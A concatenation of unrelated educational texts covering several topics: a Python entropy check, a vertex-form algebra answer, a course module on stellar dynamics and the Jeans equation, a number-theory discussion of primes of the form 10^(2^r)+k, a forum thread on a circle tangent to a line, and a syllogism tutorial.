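    return (1 - x) * math.log(1 / (1 - x)) + x * math.log(1 / x)

for x in (0.1, 0.25, 0.5, 0.9):
    assert math.isclose(mixing_entropy_per_Nk(x), expansion_entropy_per_Nk(x))

print(mixing_entropy_per_Nk(0.5))  # ln 2, the equal-mixing case
```

Note that the "2Nk ln 2" in the relevant equations is this x = 1/2 case with N molecules of each species, i.e. 2N molecules in total.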
# What is the vertex form of y=2x^2 + 4x + 46 ?
Apr 3, 2017
$y = 2(x + 1)^2 + 44$

#### Explanation:

The equation of a parabola in vertex form is

$y = a(x - h)^2 + k$

where $(h, k)$ are the coordinates of the vertex and $a$ is a constant.

We can obtain vertex form by completing the square:

$y = 2(x^2 + 2x + 23)$

$\; = 2(x^2 + 2x + 1 - 1 + 23)$

$\; = 2((x + 1)^2 + 22)$

$\Rightarrow y = 2(x + 1)^2 + 44 \leftarrow$ in vertex form
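As a quick sanity check (a sketch I added, not part of the original answer): the vertex form agrees with the original quadratic everywhere, and the minimum value 44 is attained at the vertex x = -1.

```python
def original(x):
    return 2 * x**2 + 4 * x + 46

def vertex_form(x):
    return 2 * (x + 1) ** 2 + 44

# Same polynomial at every sample point, and the smallest value 44
# occurs at x = -1 (the vertex).
assert all(original(x) == vertex_form(x) for x in range(-10, 11))
assert min((original(x), x) for x in range(-10, 11)) == (44, -1)
```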
# Module 8
## The Dynamics of Stellar Systems
### Stellar encounters and relaxation time
Galaxies consist of large numbers of stars, for which computation of individual orbits, under the combined gravity of all the others, is still not possible with present-day computers. This is why we discussed potential-density pairs earlier in the course. But the density of galaxies described by smooth analytical functions ignores the individual stars, and we are implicitly assuming that the combined gravity of all the stars is much more important than the effects of star-on-star encounters. We will now show that this is a very good assumption for galaxies, but that it breaks down in some astrophysical objects, such as star clusters.
Consider a star travelling with velocity v in a galaxy consisting of N stars, spread uniformly in a region of radius R.
How likely is it that a star will encounter another star sufficiently close to have a significant effect on its velocity?
For a star moving with velocity v past another star of mass M, for its velocity to be significantly changed, it must pass within a distance b of the star, where b is given by
b = GM/v2.
Here, b is just the distance from a star of mass M where the circular orbital velocity is the same as the velocity v of the incoming star. In this situation, we can expect a significant change in the velocity vector of the impacting star.
Imagine now that the impacting star has a circle of radius b around it and perpendicular to its path, with surface area πb2. This circle will sweep out a volume in the galaxy as it moves along. Suppose it moves distance D before undergoing a near encounter with another star. We want to know how long this distance is, and how long it takes to travel that far.
The distance D can be thought of as the mean free path of the star, and the time between encounters as a 'relaxation' time -- the time it takes for significant changes to take place because of individual encounters between pairs of stars.
The volume swept out by the star along its orbit is πb2D. The mean volume per star in the galaxy is just the total volume 4/3πR3 divided by the number of stars, N.
An encounter is likely if these two volumes are the same, so we have π b2 D = 4/3 π R3 / N.
Rearranging gives the mean free path, D
D = R3 v4/(N G2 M2)
where the small factor 4/3 has been dropped.
The time between encounters is just the mean free path over the velocity, and is
t = R3 v3/(N G2 M2).
Exercise #1: Choose some appropriate values for N, the number of stars in the Milky Way, its radius R, and the typical velocity of stars v, to estimate the typical time between very close star encounters. How does this time compare with the age of the Galaxy? Try the same for stars in a globular cluster (typical sizes, velocities and stellar numbers are given in module 2). How does the time compare with the typical ages of such objects?
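A short numerical sketch of the estimate requested in the exercise. The values of N, R and v below are my own order-of-magnitude assumptions (not prescribed by the text), and the time computed is only the strong-encounter time; including the cumulative effect of weak encounters shortens the true relaxation time by a factor of order ln N.

```python
G = 6.674e-11      # gravitational constant, m^3 kg^-1 s^-2
M_SUN = 2.0e30     # solar mass, kg
PC = 3.086e16      # parsec, m
YEAR = 3.156e7     # year, s

def encounter_time(N, R_pc, v_kms, M=M_SUN):
    # t = R^3 v^3 / (N G^2 M^2): mean time between encounters
    # closer than b = GM/v^2, returned in years.
    R = R_pc * PC
    v = v_kms * 1e3
    return R**3 * v**3 / (N * G**2 * M**2) / YEAR

# Milky Way (assumed: N ~ 1e11 stars, R ~ 15 kpc, v ~ 200 km/s)
print(f"Milky Way:        {encounter_time(1e11, 15e3, 200):.1e} yr")

# Globular cluster (assumed: N ~ 1e5 stars, R ~ 5 pc, v ~ 10 km/s)
print(f"Globular cluster: {encounter_time(1e5, 5, 10):.1e} yr")
```

With these inputs the Milky Way time comes out around 10^19 yr, vastly longer than the ~1.4 x 10^10 yr age of the Galaxy, while the globular-cluster time is within an order of magnitude or two of typical cluster ages, which is why two-body effects matter there.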
The exercise shows that star-star encounters in the Milky Way are rare. Strictly speaking, we have shown that very close encounters are rare, so that changes in the velocities of the stars due to strong two-body encounters are very small. We have not yet demonstrated that the summed effect of many weak encounters also has a completely negligible effect over the lifetime of the Milky Way. This can be shown by a rigorous accounting of the sum of weak encounters for all impact parameters ranging from b = GM/v² all the way to the size of the galaxy, R (see e.g. Binney and Tremaine, Chapter 4).
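As a sketch of the estimate in Exercise #1, the formulas above can be evaluated directly; the values of N, R, v and M below are illustrative assumptions, not the only reasonable choices.

```python
G = 6.674e-11            # gravitational constant, m^3 kg^-1 s^-2
M = 2.0e30               # stellar mass ~ 1 solar mass, kg (assumed)
N = 1.0e11               # number of stars in the Milky Way (assumed)
R = 1.0e4 * 3.086e16     # galactic radius ~ 10 kpc in metres (assumed)
v = 2.0e5                # typical stellar velocity ~ 200 km/s (assumed)

# Mean free path D = R^3 v^4 / (N G^2 M^2), time between encounters t = D / v
D = R**3 * v**4 / (N * G**2 * M**2)
t = D / v

t_years = t / 3.156e7            # seconds per year
age_of_galaxy = 1.3e10           # years, approximate

print(f"mean free path ~ {D:.2e} m")
print(f"encounter time ~ {t_years:.2e} yr "
      f"(~{t_years / age_of_galaxy:.1e} galactic ages)")
```

With these numbers the encounter time exceeds the age of the Galaxy by many orders of magnitude, confirming that very close encounters are rare.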
The main effect on the orbit of a star is the total gravity of the rest of the stars, and not the effects of individual encounters with other stars.
We will now look at how we can describe bulk stellar properties statistically. This will lead to two fundamental and extremely useful equations which relate the densities and velocities of the stars to the potential: the Boltzmann equation and the Jeans equation.
### Distribution function
Consider N stars which can be described in the 6-D space of position and velocity and in time by a distribution function f,
f = f(x,y,z;U,V,W;t)
where there are dN stars in the phase-space element dx dy dz dU dV dW, i.e. between x and x+dx, y and y+dy, etc.
Then
dN = f(x,y,z;U,V,W;t) dx dy dz dU dV dW.
If we denote the gravitational potential of this distribution by Φ then the components of the gravitational force per unit mass are
Fx = −∂Φ/∂x,
Fy = −∂Φ/∂y,
Fz = −∂Φ/∂z.
The equations of motion of the ith star are given by
dUi/dt = Fx,
dVi/dt = Fy,
dWi/dt = Fz.
Now follow the dN stars in a cell of phase space through a time interval dt; they end up in a new cell, so that
dN = f(x+Udt, y+Vdt, z+Wdt; U+Fxdt, V+Fydt, W+Fzdt; t+dt)dQ'
where
dQ' = dU'dV'dW'dx'dy'dz' and x'=x+Udt etc... U'=U+Fxdt etc...
Finally, since the flow conserves phase-space volume, to first order in dt we have dQ' = dQ. The equations of motion can then be expressed as a first-order differential equation for the distribution function f:
∂f/∂t + U∂f/∂x + V∂f/∂y + W∂f/∂z + Fx∂f/∂U + Fy∂f/∂V + Fz∂f/∂W = 0.
This is the fundamental equation of stellar dynamics for a collisionless system of particles and is called the collisionless Boltzmann Equation.
If we assume that the Galaxy is in a steady state, so that the density of the stellar distribution is not changing with time (i.e. the galaxy is not expanding or contracting along any direction), then the first term vanishes:
∂f/∂t = 0.
See sections 4.1 and 4.2 of Binney and Tremaine for a complete description of the results summarised here. If we take moments of the Boltzmann equation we can derive considerable insight into the nature of the stellar distribution.
Firstly, we can integrate over all velocities dU dV dW. The result is a continuity equation, ∂ρ/∂t + ∂(ρ⟨U⟩)/∂x + ∂(ρ⟨V⟩)/∂y + ∂(ρ⟨W⟩)/∂z = 0, where ⟨U⟩, ⟨V⟩ and ⟨W⟩ denote the mean values of the velocity components. The equation expresses physically the relationship between the rate at which stars enter and leave a volume element and the change in the density in the element.
If we multiply the Boltzmann equation by the velocity and integrate over all velocities, we obtain a very useful first-order description of the system (in terms of the second moment of the velocity) called the Jeans equation. It is the equivalent for stellar systems of the Euler equation for fluid flow (see BT section 4.2, and in particular equation 4-27). The Jeans equation for a 1-D self-gravitating system with velocity dispersion σ(z), density ρ(z) and potential Φ(z) is
(1/ρ) d[ρσ²]/dz = −dΦ/dz.
Note that the system is assumed to be stable, i.e. the density and velocity dispersion are explicitly assumed to be unchanging in time.
## The vertical structure of a galactic disk
Let us consider a self-gravitating disk of stars with vertical velocity dispersion σ.
Under the effect of their own self-gravity the stars will form a disk of finite thickness in the vertical direction. Stars with small velocities will only be able to rise to small heights above the disk before returning, while the smaller number of stars with larger velocities will be able to rise to greater heights. Stars with zero vertical velocity will be restricted to mid-plane orbits. If the system of stars is in a steady state, in which the disk gets neither thicker nor thinner, then the distribution function of the stars is a function of z and W only.
f=f(z,W).
Since the system is in a steady state, we have
W ∂f/∂z + Fz ∂f/∂W = 0.
The distribution function allows one to recover many properties of the system. For example, the density ρ of the stars as a function of height is the integral over velocity of the distribution function
ρ(z) = M ∫_{−∞}^{+∞} f(z,W) dW    (1)
where M is the mass of each star, considered to be the same for all stars to keep things simple.
The force generated vertically by this density distribution is given by the integral over z of the density
Fz(z) = −4πG ∫_{0}^{z} ρ(z′) dz′    (2)
These relations allow us to recover the density and potential of the stars, if we know the distribution function, DF. We'll now look at a very simple case of a DF, and show that it leads to quite plausible density distributions for stars in a disk.
### Some simple vertical distributions of stars in a disk
Let us now consider a distribution function in which the number of stars is an exponentially declining function of their energy E --- the more energy, the fewer the stars --- and is a function only of their energy.
f(E) = ρ(0) exp(−E/σ²)/√(2πσ²)
where the energy of the star is
E = KE + PE = (1/2)W² + Φ(z).
We can define the potential to be zero at z=0 without loss of generality, so that we can write f(E) in terms of the Z height and W velocity of the stars
f(W,Z) = ρ(0) exp(−W²/2σ²)/√(2πσ²).
This distribution has a maximum at W=0 and decreases rapidly with increasing W velocity --- it is simply the Gaussian distribution function in velocity with width σ (the velocity dispersion). Note also that it is independent of Z --- stars have the same velocity distribution at all heights above the plane.
Exercise #2: Look back to an earlier lecture where we made an estimate of the stellar density near the Sun, and use this as the normalisation ρ(0) in the distribution function above. Use GNUPLOT to plot out the distribution function, adopting a vertical velocity dispersion of 20 km/s. Make an estimate of the space density of stars with speeds of more than 100 km/s. At what distance from the Sun would a volume around the Sun be expected to contain a few such stars?
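A sketch of the estimate asked for in Exercise #2, assuming a normalisation of ρ(0) = 0.1 stars per cubic parsec and σ = 20 km/s; note that 100 km/s is 5σ, so the Gaussian tail fraction is tiny.

```python
import math

rho0 = 0.1      # local stellar density, stars per cubic parsec (assumed)
sigma = 20.0    # vertical velocity dispersion, km/s
W_cut = 100.0   # speed threshold, km/s

# For a 1-D Gaussian, the fraction of stars with |W| > W_cut is
# erfc(W_cut / (sigma * sqrt(2)))
frac = math.erfc(W_cut / (sigma * math.sqrt(2.0)))
n_fast = rho0 * frac    # space density of fast stars, pc^-3

# Radius of a sphere around the Sun expected to contain about one such star
r = (3.0 / (4.0 * math.pi * n_fast)) ** (1.0 / 3.0)

print(f"tail fraction {frac:.2e}, density {n_fast:.2e} pc^-3, radius ~ {r:.0f} pc")
```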
### Isothermal disk
In general the velocity dispersion may change with Z, but let's first consider the case where the velocity dispersion is constant, as we just saw above. This is called an isothermal disk. The name isothermal (or constant temperature) shows that one is thinking here of the velocity dispersion of the stars as equivalent to their internal energy.
Integrating f=f(W) over velocity W we obtain the density distribution of the stars from Eqn (1). The solution has the form
ρ(z) = ρ(0) sech²(z/z0)
where z0 is the scale height of the stars, and is given by
z0 = σ / √(2 π G ρ(0)).
Note that sech is a hyperbolic trigonometric function
sech(x) = 1/cosh(x)
where cosh(x) = (exp(x)+exp(−x))/2 and sinh(x) = (exp(x)−exp(−x))/2.
Plots of density distributions of this type are shown below for several different scale heights.
At large distances from the plane, it falls off close to exponentially, while close to the plane it is nicely rounded over, so that the density changes smoothly when crossing from negative to positive Z (i.e. the density gradient at Z=0 is zero).
Two of the distributions above are quite good descriptions for the young (100 pc scale height) and the old disk (300 pc scale height) respectively.
Exercise #3: Build a model of the local disk by combining two sech²(z/z0) laws, one for the young disc and one for the old disc. Adopt a total local density of matter of 0.1 solar masses per cubic parsec. After choosing appropriate normalisations for the young and old disks' central densities, plot the combined density distribution. Although the summed distribution is a reasonable match to the real disk, what is wrong with simply summing the two density laws together?
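A minimal sketch of the two-component model in Exercise #3; the 50/50 split of the 0.1 solar masses per cubic parsec between the two components is an assumption made purely for illustration.

```python
import math

def sech2(x):
    return 1.0 / math.cosh(x) ** 2

# Assumed 50/50 split of the 0.1 Msun/pc^3 local density between components
rho0_young, z0_young = 0.05, 100.0   # Msun/pc^3, pc
rho0_old,   z0_old   = 0.05, 300.0   # Msun/pc^3, pc

def rho(z):
    """Combined vertical density: the sum of two sech^2 laws."""
    return rho0_young * sech2(z / z0_young) + rho0_old * sech2(z / z0_old)

for z in (0.0, 100.0, 300.0, 1000.0):
    print(f"z = {z:6.0f} pc   rho = {rho(z):.4f} Msun/pc^3")
```

One catch with the simple sum is that each sech² profile solves the isothermal equations only in its own gravity; in a real disk each component would respond to the combined potential of both.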
### Vertical force on the stars
We can solve for the vertical force on the star using equation (2) above, now that we have derived the density distribution. The result is
Fz = −4πG ρ(0)z0 tanh(z/z0)
Hence the restoring force on a star is proportional to the disk central density and the scale height of the matter.
Below is plotted the force for the three disks above, normalised so that they all have the same central density (their total masses are in proportion to the scale heights).
Note that these three disks produce quite linear force laws within the first 100 pc or so, so that any star oscillating in this potential will behave much like a simple harmonic oscillator. Note too that the force laws do not decline in a Keplerian fashion at large Z because we have considered an infinite thin sheet (which is not very physical except within a few scale heights of the mid-plane).
### The Jeans Equation
In a 1-D system, the Jeans Equation takes the form :
ρFz = d(ρσ²)/dz.
The equation expresses the relation between the potential (i.e. the force field Fz(z)), the density distribution of the stars ρ(z) and the velocity dispersion of the stars, σ(z).
For an isothermal disk, σ is constant, and we have
Fz = (σ²/ρ) (dρ/dz).
Exercise #4: From the density distribution ρ = ρ(0) sech²(z/z0) and the force law for an isothermal disk Fz = −4πGρ(0)z0 tanh(z/z0), verify that the Jeans equation holds.
The exercise shows that, for an isothermal disk, the total force on the stars depends only on their density distribution and its gradient.
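The check in Exercise #4 can also be done numerically: with the scale-height relation z0² = σ²/(2πGρ(0)), the two sides of the Jeans equation agree at every height. The values of ρ(0) and z0 below are arbitrary test inputs.

```python
import math

G = 6.674e-11     # SI units
rho0 = 1.0e-20    # arbitrary test central density, kg/m^3
z0 = 3.0e18       # arbitrary test scale height, m (~100 pc)
sigma2 = 2.0 * math.pi * G * rho0 * z0**2   # from z0 = sigma/sqrt(2 pi G rho0)

def rho(z):
    return rho0 / math.cosh(z / z0) ** 2          # rho(0) sech^2(z/z0)

def Fz(z):
    return -4.0 * math.pi * G * rho0 * z0 * math.tanh(z / z0)

def check(z, h=1.0e12):
    """Compare rho*Fz with d(rho*sigma^2)/dz via a central difference."""
    lhs = rho(z) * Fz(z)
    rhs = sigma2 * (rho(z + h) - rho(z - h)) / (2.0 * h)
    return lhs, rhs

for z in (0.5 * z0, z0, 2.0 * z0):
    lhs, rhs = check(z)
    print(f"z/z0 = {z / z0:3.1f}: lhs = {lhs:.4e}, rhs = {rhs:.4e}")
```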
To solve the Jeans Equation for non-isothermal disks, one can start from a vertical density distribution and derive the velocity dispersion for the stars.
In this case, we combine the Jeans Equation and the 1-D Poisson Equation:
ρFz = d(ρσ²)/dz.
and
d²Φ/dz² = 4πGρ.
To do this, divide the Jeans equation by ρ, differentiate with respect to z, and substitute for d²Φ/dz² using the Poisson equation. The result is
d [ (1/ρ) d(ρσ²)/dz ] /dz = −4πGρ.
Thus, for a self-gravitating disk of a given density distribution, this allows us to now derive the velocity dispersion of the stars as a function of z height, as well as the vertical force downwards on the stars.
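A numerical sketch of this procedure for an exponential density law (anticipating the next exercise); the values of ρ(0), z0 and σ(0) below are assumed local-disk numbers, and the force law is the analytic integral of the density.

```python
import math

G = 4.301e-3    # gravitational constant in pc (km/s)^2 / Msun
rho0 = 0.1      # mid-plane density, Msun/pc^3 (assumed)
z0 = 300.0      # scale height, pc (assumed)
sigma0 = 20.0   # mid-plane velocity dispersion, km/s (assumed)

def rho(z):
    return rho0 * math.exp(-z / z0)

def Fz(z):
    # Fz = -4 pi G * integral_0^z rho dz', analytic for the exponential law
    return -4.0 * math.pi * G * rho0 * z0 * (1.0 - math.exp(-z / z0))

def sigma(z, n=2000):
    """Integrate d(rho sigma^2)/dz = rho Fz from the mid-plane up to z."""
    h = z / n
    integral = 0.0
    for i in range(n):   # trapezoidal rule
        zi, zj = i * h, (i + 1) * h
        integral += 0.5 * h * (rho(zi) * Fz(zi) + rho(zj) * Fz(zj))
    return math.sqrt((rho0 * sigma0**2 + integral) / rho(z))

for z in (100.0, 500.0, 1000.0):
    print(f"z = {z:6.0f} pc   sigma = {sigma(z):5.1f} km/s")
```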
Exercise #5: We have already derived the velocity dispersion and force law for an isothermal disk, with σ = const. Observations show that the vertical density profile of the local galaxy is actually a bit sharper (more centrally concentrated) than the isothermal profile. It is in fact closer to being exponential: ρ = ρ(0) exp(−|z|/z0). For this exponential density law, first derive the force law Fz and, using the Jeans equation, derive the velocity dispersion profile σ(z) as a function of height z. For the local disk, appropriate values to adopt are ρ(0) = 0.1 solar masses per cubic parsec and σ(0) = 20 km/s. Plot the density, force law and velocity dispersion profiles with GNUPLOT over the vertical range 0 to 1 kpc.
Review: We have looked at the Poisson, Jeans and Boltzmann equations for a simple, 1-D stellar system, the vertical structure of a disk of self-gravitating stars (and gas). They allow us to relate the density and dynamics of the stars without having to compute orbits of every star -- statistical properties can be sufficient for a wide range of purposes, one of which was shown here.
Exercise #6: This is a more challenging exercise. Recently, a very dim galaxy - a satellite of our own Milky Way - was discovered by Belokurov et al (2007) in the SDSS survey, and is called Segue I. In this paper, the "core radius" and velocity dispersion of the galaxy have been measured as a=20 parsecs and σ=4 km/s. We will model this galaxy as an isothermal sphere (see lecture 4) to make an estimate of the amount of matter that lies within the core radius. First, use the Jeans equation to show that the velocity dispersion σ is related to the circular velocity via V²circ = 2σ². Note: the Jeans equation in spherical coordinates is (1/ρ) d(ρσ²)/dr = −dΦ/dr. From the circular speed, make an estimate of the amount of matter within the core radius. The amount of visible matter within the core radius is approximately 300 solar masses (all seen as stars -- there is virtually no gas in the system). How does this compare with the estimate of the total matter? What do your results say about the system?
We have now looked at two 1-D systems -- the vertical distribution of stars in a disk, and the radial distribution of stars in an isothermal population. Later in the course we'll extend ourselves to more dimensions, by looking at the density and kinematics of stars in the Milky Way's stellar halo. |
# Between Fermat's primes and the twin primes
Let me start with a curiosity. The integers $11,13,17,19$ are prime numbers, and $101,103,107,109$ are prime as well. One might wonder whether there is another occurrence where $10^m+1,10^m+3,10^m+7$ and $10^m+9$ are prime numbers. If so, then necessarily $m=2^r$ for some integer $r$ (same argument as for Fermat's numbers).
It is still unknown whether there are infinitely many prime numbers in Fermat's list $2^{2^r}+1$. Presumably, the same question for the list $10^{2^r}+1$ remains open. Likewise, it is not known whether there are infinitely many twin prime numbers $(p,p+2)$. If we impose both constraints, could we expect the question to be more tractable?
Are there finitely or infinitely many integers $r$ such that $10^{2^r}+\{1,3,7,9\}$ are all primes? I guess no. For $r=2$, we have $10001=73\cdot137$. For $r=3$, $p=17$ divides $10^{2^3}+1$.
There is a natural extension of the question, where $10$ is replaced by $n\ge2$ and $\{1,3,7,9\}$ is replaced by a set of representatives of $({\mathbb Z}/n{\mathbb Z})^\times$.
An overwhelming belief is that there are only finitely many such exponents $r$. But what I am really asking is whether, for some $n$, there is a proof that uses our current artillery.
• While this is a famous unsolved problem, it seems certain that the Fermat primes are finitely many. If $X$ should be prime with probability $1/\log{X}$ (in the naive probabilistic model based on the PNT), then certainly an unbiased set $S \subset \mathbb{N}$ with $\sum_{s \in S} 1/\log{s} < \infty$ should have a finite intersection with the primes. – Vesselin Dimitrov Aug 12 '15 at 9:25
• BTW, for $r=2$ only $7$ and $9$ have the property. For $r=3$, only $7$ has the property. Unfortunately, I have not been able to find tables beyond $10^{13}$, but it would be interesting to see if $10^{16}+\{1,3,7,9\}$ contains any primes at all. – M.G. Aug 12 '15 at 9:32
• Vesselin, key word is unbiased. I am not so sure that it is so for $2^{2^n}+1$. Say, its prime factors a priori belong to arithmetic progression $2^{n+2}x+1$. Probably, we need more careful probabilistic heuristics. – Fedor Petrov Aug 12 '15 at 10:43
• @Fedor: You are right, "unbiased" probably does not apply here; though I still think it should be possible to give a reasonable heuristic taking care of the special property you mention, and predicting finiteness in this problem. (And for all I know, one may never find a prime in $2^{2^n}+1$ beyond $n = 4$.) – Vesselin Dimitrov Aug 12 '15 at 11:15
• For $2 \leq r \leq 1000$, there is always a prime $\leq 11605787$ that divides one of $10^{2^{r}} + k$ for $k \in \{1, 3, 7, 9 \}$. It's also true that $10^{2^{r}} +3$ is a multiple of $7$ if $r$ is even, and $19$ divides $10^{2^{r}} + 3$ if $r \equiv 5 \pmod{6}$. Finding and patching together similar congruences might allow one to produce a proof that at least one of $10^{2^{r}} + k$ is composite for all $r \geq 2$. – Jeremy Rouse Aug 12 '15 at 15:11
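The congruence search described in the last comment can be sketched with modular exponentiation, which avoids ever forming the huge number $10^{2^r}+k$; the prime bound below is an arbitrary choice.

```python
def small_factor(r, k, prime_bound=10**6):
    """Return a prime p <= prime_bound dividing 10^(2^r) + k, or None.

    pow(10, 2**r, p) keeps everything modular, so the huge number
    10^(2^r) + k is never actually formed.
    """
    sieve = bytearray([1]) * (prime_bound + 1)   # simple Eratosthenes sieve
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(prime_bound ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i :: i] = bytearray(len(sieve[i * i :: i]))
    for p in range(2, prime_bound + 1):
        if sieve[p] and (pow(10, 2 ** r, p) + k) % p == 0:
            return p
    return None

print(small_factor(2, 1))   # 73, since 10^4 + 1 = 10001 = 73 * 137
print(small_factor(3, 1))   # 17 divides 10^8 + 1
print(small_factor(2, 3))   # 7 divides 10^4 + 3 (r even)
```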
# Multiply Three Numbers
In this multiplication activity, students solve 26 problems in which they fill in missing factors and apply order-of-operations rules. Students multiply three numbers, computing the factors in parentheses first.
# Math Help - Really tough circle problem
1. ## Really tough circle problem
Hi, My problem is this : find the equation of the circle determined by the given conditions :
center (-2,3) and tangent to the line 4y-3x+2=0.
the equation for the line is y = (3/4)x − 1/2 (I'm pretty sure)
so I drew that line, then I figured I would need to use the distance formula from where the line starting at (-2,3) with slope -4/3 (negative reciprocal of 3/4) intersects 4y-3x+2=0.
However, it doesn't intersect at a nice point; I can't determine the exact x,y by graphing. I don't see how to apply the distance formula to an arbitrary point. The only other thing I can think of is that the circle can only intersect 4y-3x+2=0 once, not twice. I also can't figure out how to make any triangles that would help me. I'm stumped. What do I do? Who knows the answer? I want to know badly.
2. You almost have it. *Really* close.
Formula for line from (-2, 3) with slope -4/3 is
y - 3 = -4/3(x + 2)
Now find where this intersects
4y - 3x + 2 = 0
These should intersect at one point, P, because they are perpendicular.
Calculate the distance from (-2, 3) to P, and this is the radius for your circle.
This touches the line once. Why? The radius from (-2,3) to P forms right angles with the line.
3. The distance from $(-2,3)$ to the line $3x-4y-2=0$ is $\dfrac{|3(-2)-4(3)-2|}{\sqrt{(3)^2+(-4)^2}}$.
That distance is the radius of the circle.
4. I want to know how to find P. When I graphed it, P was not a point I could see; it was between coordinates. How can I get the distance between the center and P if I have to guess what P is, because it's not at an exact point (meaning x and y are fractions and I can't tell what the fractions are)?
Also I got another similar question. - Center on the line x+y=1, Passes through (-2,1) and (-4,3):
I think that (-2,1) and (-4,3) should be the focus and directrix of a parabola, and any point on that parabola that hits the line x+y=1 should be the center, since it will be equidistant from the 2 points and also on the line.
I got (y-2)=1/4(x+3) as the equation of the parabola (used midpoint formula to get vertex) and y=-x+1 as the line.
but I have the same problem as the other question. The line intersects the parabola at a point I can't identify when I graph them; x and y are fractions, not exact points. How do I figure out problems that boil down like this?
I need to know how to find P, basically. I mean, it's possible my math was just wrong and P actually turned out to be a point with exact coordinates rather than fractions.
(also how do I thank people who try to help me? I see it has a thanked option)
5. When two lines intersect, their x and y coordinates are equal.
y - 3 = -4/3(x + 2) intersects 4y - 3x + 2 = 0
at the x and y that simultaneously solves the 2 equations.
This solution for x and y is P.
Also you can use the formula for distance from point to line formula provided in an earlier post (without directly finding P).
6. To answer the OP, all one needs is the distance from the center to the tangent line.
We do not need to find p.
7. Your parabola question is a bit unclear.
Did you mean (y-2) = 1/4(x+3)^2 ?
To find the intersection between the parabola and the line y=-x+1
Again, you find the simultaneous solution(s) for x and y that solve both
(y-2) = 1/4(x+3)^2 and y=-x+1
Example: You can use substitution to get
(y-2) = (-x+1-2) = -x-1 = 1/4(x+3)^2
solve for x
and then use this to find y = -x+1
8. yeah i meant ^2 on the end of that parabola.
Also, I realize that the answer is the distance between p and center.
By graphing the line 4y-3x+2=0 I cannot clearly tell which point intersects with the perpendicular line from the center of the circle. Therefore how can I tell what to input into the distance formula? This is what I want to know.
OK to best clear this up in my mind, You can tell me what to fill into this equation :
(x - -2)^2 + (y - 3)^2 = Z
What are x and y, and how did you get them?
(-2 and 3 are the center of the circle; x and y are the coordinates I can't clearly read off when I graph the equation 4y-3x+2=0. I understand what point it should be (the intersection), I just can't tell what it is.)
9. Alright, lets do it by the intersection method.
y - 3 = -4/3(x + 2) intersects 4y - 3x + 2 = 0 where?
Lets solve this system (substitue y = -4/3(x+2) + 3 into the second equation)
4(-4/3(x+2) + 3) - 3x + 2 = 0
Solving gives x = 2/5
y = -4/3(2/5 + 2) + 3 = -1/5
so P = (2/5, -1/5)
Distance from (-2,3) to (2/5,-1/5)?
sqrt((-2 - 2/5)^2 + (3 + 1/5)^2) = 4
Equation for the circle at center -2, 3 with radius 4 is
(x + 2)^2 + (y - 3)^2 = 4^2
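The two approaches in this thread can be checked with a short script; the numbers below simply mirror the worked solution above.

```python
import math

# Centre of the circle; tangent line 4y - 3x + 2 = 0 as ax + by + c = 0
cx, cy = -2.0, 3.0
a, b, c = -3.0, 4.0, 2.0

# Method 1: point-to-line distance |a*cx + b*cy + c| / sqrt(a^2 + b^2)
r_formula = abs(a * cx + b * cy + c) / math.hypot(a, b)

# Method 2: distance from the centre to the foot of the perpendicular,
# P = (2/5, -1/5), found by substitution as in the post above
px, py = 2.0 / 5.0, -1.0 / 5.0
r_intersect = math.hypot(cx - px, cy - py)

print(r_formula, r_intersect)   # both ≈ 4.0
# Circle: (x + 2)^2 + (y - 3)^2 = 16
```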
10. Originally Posted by snowtea
Your parabola question is a bit unclear.
Did you mean (y-2) = 1/4(x+3)^2 ?
To find the intersection between the parabola and the line y=-x+1
Again, you find the simultaneous solution(s) for x and y that solve both
(y-2) = 1/4(x+3)^2 and y=-x+1
Example: You can use substitution to get
(y-2) = (-x+1-2) = -x-1 = 1/4(x+3)^2
solve for x
and then use this to find y = -x+1
Hold on, sorry, I didn't see this post; trying it now. Also, Plato, I saw the formula you posted but I didn't get why it would work; never seen that before.
11. On a tangent line to a circle, the point of tangency is the nearest point to the center.
So the distance from the center to a tangent line is the radius of the circle.
12. Awesome! I never thought to substitute. Oops. I guess that when you substitute it takes the 1st equation and just adds the parameters of the 2nd. Then when you solve, bang. Cool, I so get it now. Thank you so much to both of you for helping!
PS: how do I thank you guys? I see you get creds for helping people.
13. Originally Posted by Plato
The distance from $(-2,3)$ to the line $3x-4y-2=0$ is $\dfrac{|3(-2)-4(3)-2|}{\sqrt{(3)^2+(-4)^2}}$.
That distance is the radius of the circle.
Why does plugging the center into the left-hand side of the line's equation, taking the absolute value, and dividing by the square root of the sum of the squared coefficients give the radius of the circle? Can you help me picture why that works?
14. Glad you got it. I think you were already really close from the beginning.
You can thank people by clicking the thanks button (thumbs up icon) under the post.
15. The formula is a shortcut for what you did with the perpendicular line.
If you solve for P algebraically and calculate this distance, it simplifies to the formula.
You can derive the formula in this way.
The reason why the equation looks so simple requires understanding a bit about vectors and dot products. You don't have to worry about it if you haven't learned about vectors yet.
# Syllogisms or Statements and Conclusions
A syllogism question contains 2 or more statements and 2 or more conclusions, followed by 4 options.
Statement 1: - - - -
Statement 2: - - - -
Conclusion 1: - - - -
Conclusion 2: - - - -
Option 1: If only conclusion 1 can be drawn from the given statements.
Option 2: If only conclusion 2 can be drawn from the given statements.
Option 3: If both conclusions 1 and 2 can be drawn from the given statements.
Option 4: None of the conclusions can be drawn from the given statements.
Example Question:
Statements:
1: All MBAs are Graduates
2: All Graduates are Students
Conclusions:
1: All MBAs are Students
2: Some Students are MBAs
There are two types of Conclusions:
1. Immediate Inferences
2. Logical Conclusions.
Immediate inferences are conclusions drawn from only one statement. For example, from the statement All A's are B's, we can draw Some A's are B's and Some B's are A's. These are easy to draw.
For logical conclusions you have to follow the complete theory below.
Understanding Syllogism question:
Questions on syllogisms contains only the following 4 types of statements:
1. The universal positive : Eg: All $\mathop X\limits^{\rm{\surd}}$ are $\mathop Y\limits^{\rm{\times}}$
2. The universal negative : Eg: No $\mathop X\limits^{\rm{\surd}}$ is $\mathop Y\limits^{\rm{\surd}}$
3. The particular positive: Eg: Some $\mathop X\limits^{\rm{\times}}$ are $\mathop Y\limits^{\rm{\times}}$
4. The particular negative : Eg: Some $\mathop X\limits^{\rm{\times}}$ are not $\mathop Y\limits^{\rm{\surd}}$’s
Here the check mark ($\surd$) indicates "distribution". A term is distributed if the statement covers each and every element of it. All X are Ys means X $\subseteq$ Y, but Y need not be a subset of X. So Y does not have a check mark.
You should commit to memory how to place the $\surd$ and $\times$ marks, and how to distinguish positive from negative and universal from particular statements.
Here two statements are universal (1 and 2), and two statements are particular (3 and 4).
Two statements are positive (1 and 3) and two statements are negative (2 and 4).
